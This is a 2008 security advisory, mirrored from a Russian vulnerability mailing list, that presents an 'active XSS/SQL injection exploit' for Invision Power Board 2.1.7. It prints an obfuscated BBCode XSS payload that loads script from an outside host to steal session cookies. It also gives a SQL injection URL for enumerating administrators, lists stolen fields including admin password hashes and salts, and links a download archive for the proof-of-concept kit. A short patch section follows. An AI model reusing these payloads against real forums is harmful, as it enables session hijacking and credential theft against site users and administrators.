Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  NetRisk 1.9.7 Remote File Inclusion Vulnerability

From:underwater_(at)_itdefence.ru <underwater_(at)_itdefence.ru>
Date:6 января 2008 г.
Subject:INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT

----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

                                               INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
                                                       Eugene Minaev [email protected]
                               __________________________________________________
_________________
                       ____/  __ __ _______________________ _______  _______________    \  \   \
                       / .\  /  /_// //              /        \       \/      __       \   /__/   /
                       / /     /_//              /\        /       /      /         /     /___/
                       \/        /              / /       /       /\     /         /         /
                       /        /               \/       /       / /    /         /__       //\
                       \       /    ____________/       /        \/    __________// /__    // /   
                       /\\      \_______/        \________________/____/  2007    /_//_/   // //\
                       \ \\                                                               // // /
                       .\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
                       . \_\\________[________________________________________]_________//_//_
/ . .
                
               ----[ NITRO ... ]
               
               This vulnerability was already found before, but there was no available
               public "figting" exploit for it. This POC consists of several parts - active xss
generator,
               JS-file, which will be caused at visiting page with xss, log viewer and special component,
               which will take necessary data from MySQL forum's tables in case if intercepted session
               belonged to the person with moderator privileges.
               
               ----[ ANALYSIS ... ]
               
               XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss
for
               future injetion on the forum board. As the reference it is necessary to specify the full
way
               up to ya.js file (in which you have already preliminary corrected way on your own). Most
likely
               it is necessary only to press the button.
               
               [img]http://www.ya.ru/[snapback]       
onerror=script=document.createElement(String.fromCharCode(115,99,114,
              
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.
replace(/x/g,String.fromCharCode(47)),
              
head=document.getElementsByTagName(String.fromCharCode(104,101,97,
100)).item(0),head.appendChild(script)
               style=visibility:hidden =[/snapback].gif[/img]
               
               The injection can be executed only when there is available session of the user with
access
               in moderator's panel.It is necessary to result "starter" parameter to numerical by means
of "intval"
               function.In case of successfull injection there is an oppotunity to enumerate forums'
administrators team:
               
              
index.php?act=mod&f=-
6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union
+select+1/*
               
               ----[ RECORD ... ]
               {
               
                       ---IP ADDRESS   sniffed ip address
                       ---REFERER              xssed theme
                       ---COOKIES              xssed cookies of forum member
                       ---USER ID              xssed user id of forum member
                       ---ADMIN NAME   admin username
                       ---ADMIN PASS   admin pass hash
                       ---ADMIN SALT   admin hash salt
                       
               }
               
               ----[ PATCH ... ]
               
               FILE
                       sources/classes/bbcode/class_bbcode_core.php
               FUNCTION
                       regex_check_image
               LINE
                       924
               REPLACE
                       if ( preg_match( "/[?&;]/", $url) )
               ON
                       if ( preg_match( "/[?&;\<\[]/", $url) )
                       
                       
               FILE
                       sources/classes/bbcode/class_bbcode_core.php
               FUNCTION
                       post_db_parse_bbcode
               LINE
                       486
               REPLACE
                       preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).
+?)?(\[/$preg_tag\])#si",
$t, $match );
               ON
                       preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).
+?)?(\[/$preg_tag\])#si",
$t, $match );

                       if ( $row['bbcode_tag'] == 'snapback' )
                       {       
                               $match[2][$i] = intval( $match[2][$i] );
                       }  
                       
                       
               
               www.underwater.itdefence.ru/isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород